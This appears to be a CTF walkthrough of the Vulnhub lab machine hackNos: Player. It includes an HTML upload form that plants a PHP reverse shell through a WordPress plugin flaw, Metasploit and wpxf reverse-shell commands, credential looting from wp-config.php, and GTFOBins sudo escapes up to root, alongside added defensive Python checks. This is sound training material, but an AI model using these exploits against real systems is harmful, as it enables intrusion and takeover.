medium.com

hackNos: Player v1.1 | Vulnhub Walkthrough

Dot Dot Slash

hackNos is a machine with an interesting mix of realism and CTF-style tricks. Even though the underlying vulnerabilities are straightforward to exploit, this machine demands next-level enumeration skills. Thanks to Rahul Gehlaut for this amazing box.

Level: Intermediate

You need to fire up arp-scan or netdiscover to find the IP of hackNos. There are only two services: HTTP (80) and MySQL (3306).

Use arp-scan to discover IP address

The only interesting service is a website on port 80

Enumeration

I could see an Apache default page but was unable to find any useful paths. I ran dirb with the common and big word-lists and tried extension-based dir-busting. I even tried my luck with cewl to generate a custom word-list, but I couldn't find any leads.

Default page on port 80

After a good sleep following the hectic work week, I sat down and thought it through. Within half an hour of enumeration, I found the clue on the default page itself: it states that the document root is /var/www/html/g@web. That usually means the default index.html page you are seeing is inside the g@web folder. However, on this site the document root is not /var/www/html/g@web but /var/www/html (I know, the information on the page is misleading, but it is possibly a CTF-style modification).

You need to browse to http://192.168.56.107/g@web/ to find a WordPress blog.

Hint on default page

WordPress blog

When it comes to WordPress enumeration, my favorite tool is wpscan. Make sure you run wpscan with an API token, which you can generate at wpvulndb.com (you need to register a free account), so that it reports all known vulnerabilities.

wpscan --url http://192.168.56.107/g@web/ --api-token <token>

Run wpscan with the API token to see vulnerabilities

When it comes to WordPress, not updating plugins can largely undermine the security of the website. WP Support Plus Responsive Ticket System v7.1.3 is in use here, which is vulnerable to SQL injection, RCE via file upload and privilege escalation.

WP Support Plus Responsive Ticket System plugin is vulnerable to RCE, Privilege Escalation, SQL Injection etc.

Exploiting RCE for shell

If you read the advisory WPVDB ID 10119 for remote code execution, it is self-explanatory. The vulnerable plugin does not restrict the upload of .phtml, .php5 and similar lesser-known PHP extensions, enabling us to upload reverse-shell PHP code with a .phtml extension.

I used the reverse shell PHP payload from the /usr/share/webshells/php/ folder, which gets uploaded to the http://192.168.56.107/g@web/wp-content/uploads/wpsp/ folder using the sample HTML form below. The PHP reverse shell payload should be edited to match your netcat listener and should be named with a .phtml or .php5 extension.

<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://192.168.56.107/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
</body>
</html>
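As an added illustration of the extension-check gap described above (my own example, not code from the walkthrough or from the plugin): the naive blocklist mirrors a "reject .php" check and lets .phtml and .php5 through, the allowlist version rejects them (and also double extensions such as shell.php.jpg, going slightly beyond the post), and the last helper flags files in a wpsp uploads listing that Apache would execute. The PHP extension set and the directory listing are constructed for illustration; check them against your own Apache configuration.

```python
import os

# Extensions a typical Apache + mod_php setup hands to the PHP interpreter. Constructed
# from common Debian-style FilesMatch patterns for illustration; verify against your own config.
PHP_EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Attachment types a ticket system legitimately needs (assumed allowlist).
ALLOWED_ATTACHMENT_EXTS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "log"}


def blocklist_check(filename: str) -> bool:
    """Weak check that only rejects '.php': this is the gap that lets shell.phtml through."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened check: accept only a named file with at least one extension where every
    extension segment is allowlisted, so shell.phtml, rev.php5 and shell.php.jpg are rejected."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(ext in ALLOWED_ATTACHMENT_EXTS for ext in parts[1:])


def find_executable_uploads(names):
    """Incident-response helper: given file names found under wp-content/uploads/wpsp/,
    return those Apache would execute as PHP, in listing order."""
    flagged = []
    for name in names:
        parts = os.path.basename(name).lower().split(".")
        if len(parts) >= 2 and parts[-1] in PHP_EXECUTABLE_EXTS:
            flagged.append(name)
    return flagged


# Constructed listing of an uploads directory after an upload like the one described.
SAMPLE_LISTING = ["ticket-42.png", "invoice.pdf", "shell.phtml", "notes.txt", "rev.php5"]

if __name__ == "__main__":
    for name in SAMPLE_LISTING:
        print(f"{name:14} blocklist={blocklist_check(name)!s:5} allowlist={allowlist_check(name)}")
    print("would execute:", find_executable_uploads(SAMPLE_LISTING))
```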

Upload reverse shell PHP code as .phtml file

A reverse shell can be obtained using the file upload

Alternatively we can use wordpress-exploit-framework, an awesome tool by rastating that is pretty much the Metasploit of WordPress. The tool supports Metasploit payloads and follows the familiar Metasploit syntax.

Alternatively wordpress-exploit-framework can be used to exploit the issue

Configure a reverse handler in Metasploit to get a shell

#commands to run the exploit module on wpxf
wpxf #command to start wordpress-exploit-framework
search wp_support
use exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload
set host 192.168.56.107
set target_uri /g@web
set payload meterpreter_reverse_tcp
set lport 8443
set lhost 192.168.56.103
#Do not forget to spin up a handler in Metasploit
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.103
set lport 8443
run

The shell is only the beginning

The way beyond the shell was frustrating. I pursued various vectors including local exploits, reusing the password disclosed in wp-config.php, cracking user passwords looted from the WordPress database, etc. Later I found the necessary hint in the wp_usermeta table inside the database, in the form of a meta_value.

Tip: You need an interactive shell to work with MySQL normally; in restrictive shells use python -c 'import pty; pty.spawn("/bin/sh")' to spawn an interactive shell.

mysql -u wp -p

Database credentials can be obtained from /var/www/html/g@web/wp-config.php

The wp_usermeta table has the hint for privilege escalation

After a few trial-and-error attempts I was able to log in as the local user security with the password we found earlier.

There are four users in the system
Logged in as the security user with the password from the database

Linux-smart-enumeration (LSE) is usually my trusty script for local enumeration on any Linux box. I found from the LSE output that the user named security is allowed to run the find command as hackNos-boat. GTFOBins is an awesome project that helps in situations involving SUID or sudo misconfigurations; it maintains a curated list of known shell-escape and privilege-escalation techniques for Unix binaries. We can use the command below to escalate our privileges.

#https://gtfobins.github.io/gtfobins/find/
sudo -u hackNos-boat find . -exec /bin/sh \; -quit

The user has permission to run the find command as hackNos-boat

Escalate privileges to hackNos-boat

The hackNos-boat user has similar access to run ruby as hunter. The hunter account has access to the user flag.

#https://gtfobins.github.io/gtfobins/ruby/
sudo -u hunter ruby -e 'exec "/bin/sh"'

The user has permission to run ruby as hunter
The user flag can be read from the hunter account

Similarly, hunter has sudo access to gcc. At this point, rooting the box is trivial.

#https://gtfobins.github.io/gtfobins/gcc/#shell
sudo gcc -wrapper /bin/sh,-s .
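The three sudo hops above form a chain from the security user to root. As an added example (mine, not from the walkthrough), the script below parses sudo -l output collected for each account and searches for a path to root that only uses binaries GTFOBins documents as shell-capable, which is the check a defender can run over a fleet's sudoers rules. The sudo -l text and the SHELL_CAPABLE subset are constructed for illustration and are not exhaustive.

```python
import os
import re
from collections import deque

# Subset of binaries for which GTFOBins documents a sudo shell escape (constructed, not exhaustive).
SHELL_CAPABLE = {"find", "ruby", "gcc", "vim", "python", "python3", "perl", "awk", "less", "env"}

# Constructed 'sudo -l' output for the three accounts, in the shape found on hackNos.
SUDO_L_OUTPUT = """User security may run the following commands on hackNos:
    (hackNos-boat) NOPASSWD: /usr/bin/find
User hackNos-boat may run the following commands on hackNos:
    (hunter) NOPASSWD: /usr/bin/ruby
User hunter may run the following commands on hackNos:
    (root) NOPASSWD: /usr/bin/gcc, /usr/bin/apt-get
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands")
# Matches '(runas) TAG: cmd, cmd'; '(ALL : ALL)' yields runas 'ALL', tags such as NOPASSWD: are skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^):\s]+)[^)]*\)\s*(?:\S+:\s*)*(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Turn concatenated 'sudo -l' output into (runner, runas, binary) edges."""
    edges, current = [], None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = RULE_RE.match(line)
        if m and current:
            for cmd in m.group("cmds").split(","):
                edges.append((current, m.group("runas"), os.path.basename(cmd.split()[0])))
    return edges

def find_escalation_chain(edges, start="security", goal="root"):
    """BFS over shell-capable rules only; returns the shortest list of (user, binary, next_user) hops, or None."""
    graph = {}
    for runner, runas, binary in edges:
        if binary in SHELL_CAPABLE:
            graph.setdefault(runner, []).append((binary, goal if runas == "ALL" else runas))
    queue, seen = deque([(start, [])]), {start}
    while queue:
        user, path = queue.popleft()
        if user == goal:
            return path
        for binary, nxt in graph.get(user, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(user, binary, nxt)]))
    return None
```

Rules for non-shell-capable binaries such as apt-get are parsed but never used as a hop, so a chain is only reported when every step has a documented shell escape.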

Hunter has access to run gcc with root privileges
Root access obtained

Root flag

Closing Thoughts

hackNos is a good machine with a focus on enumeration. The GTFOBins chaining scenario was fun. Overall, a solid challenge.